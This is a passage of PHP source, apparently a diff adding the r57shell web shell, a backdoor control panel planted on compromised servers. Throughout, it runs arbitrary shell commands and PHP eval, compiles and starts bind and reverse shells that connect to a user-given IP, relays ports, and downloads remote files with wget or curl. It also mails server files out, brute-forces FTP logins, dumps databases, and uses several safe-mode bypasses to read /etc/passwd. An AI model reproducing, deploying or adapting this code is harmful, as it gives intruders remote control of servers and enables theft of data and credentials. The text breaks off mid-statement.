ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);} + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);} + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); + $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $lines = file ('/tmp/mb_send_mail'); + foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo $str; + @imap_close($stream); + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function up_down($id) + { + global $lang; + global $language; + return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo 